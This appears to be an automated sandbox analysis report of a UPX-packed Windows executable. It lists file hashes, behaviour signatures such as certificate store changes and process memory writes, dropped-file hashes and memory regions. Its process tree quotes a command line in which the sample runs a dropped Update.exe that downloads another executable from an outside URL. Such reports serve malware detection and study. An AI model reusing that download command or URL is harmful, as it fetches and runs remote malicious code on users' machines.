Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2023 01:42

General

  • Target

    db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe

  • Size

    5.1MB

  • MD5

    abe375968fe70ae9e888afebad4a6c2b

  • SHA1

    88c0d4fef42b66e43daa9673d960f397f5e197ab

  • SHA256

    db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec

  • SHA512

    b0529eb277cd850a131f01001750cbda4beadb3693780e12ec8f5c2ca06c6c62cbf8fa97d1cb7ade063929109b486ae892ba59b2fd33499627c7ddf9793eeeb3

  • SSDEEP

    98304:r6ntlkzALq+xRTFsPBxElbeWOZYeXmd/nyVVT3DjQtvDmpG913swwmJGancjNSxJ:untlkzALq+xRTFsPBxElbeWOZYeXmd/Z

Score
8/10
upx

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 4 IoCs
  • UPX packed file 27 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe
    "C:\Users\Admin\AppData\Local\Temp\db5168fba184eba9f057379b1163566a9e438769d6aaaef2b11343f26c3971ec.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Users\Admin\AppData\Local\Temp\Update.exe
      "C:\Users\Admin\AppData\Local\Temp\Update.exe" 2 http://a.tmvhoro.cn/ud/ftdk1.5.exe C:\Users\Admin\AppData\Local\Temp\ %7C%7C%7C%7C%CC%E1%CA%BE%A3%BA%C8%E7%D2%BB%D6%B1%CC%E1%CA%BE%B8%FC%D0%C2%A3%AC%CE%DE%B7%A8%B5%C7%C2%BC%B5%C4%A3%AC%C7%EB%BD%E2%D1%B9%D7%EE%CF%C8%CF%C2%D4%D8%B5%C4%CE%C4%BC%FE%BA%F3%A3%AC%B2%A2%C9%BE%B3%FD%A3%BAUpdate.exe+%A3%AC%CE%C4%BC%FE%BA%F3%D6%D8%D0%C2%B4%F2%BF%AA%C8%ED%BC%FE%A3%AC%CD%EA%B3%C9%B8%FC%D0%C2%BA%F3%A3%AC%C8%E7%BB%B9%D2%BB%D6%B1%CC%E1%CA%BE%B8%FC%D0%C2%A3%AC%C7%EB%B7%B4%C0%A1bug %B7%B9%CD%C5%C9%CF%BB%F5%BE%AB%C1%E9.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      PID:736

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • C:\Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • \Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • \Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • \Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • \Users\Admin\AppData\Local\Temp\Update.exe

    Filesize

    1.1MB

    MD5

    a0f316f53b3f4e09bfc9157f2773613a

    SHA1

    ba6e1031e025e85184681b5b7601e7ad343e5845

    SHA256

    4dce3ea33964acc8bd9802887c079e5bc5129b35c7faf5bf4c27f7c1e8f8ec48

    SHA512

    9b5054c898bea4d3fe2c633ad3ebc05d561959ccd11393fbc31521557cba097e181e27218a26a7f55bd21bf4001195639274de7e1755be31b18976e2772c34ec

  • memory/1672-38-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-48-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-13-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-11-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-17-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-15-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-20-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-22-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-26-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-28-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-24-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-32-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-0-0x0000000000340000-0x0000000000341000-memory.dmp

    Filesize

    4KB

  • memory/1672-44-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-42-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-6-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-46-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-40-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-36-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-51-0x00000000003E0000-0x00000000003E1000-memory.dmp

    Filesize

    4KB

  • memory/1672-50-0x00000000003F0000-0x00000000003F1000-memory.dmp

    Filesize

    4KB

  • memory/1672-52-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-49-0x00000000003D0000-0x00000000003D1000-memory.dmp

    Filesize

    4KB

  • memory/1672-34-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-30-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-9-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-7-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-4-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-3-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-5-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-1-0x0000000010000000-0x000000001003E000-memory.dmp

    Filesize

    248KB

  • memory/1672-82-0x00000000003F0000-0x00000000003F1000-memory.dmp

    Filesize

    4KB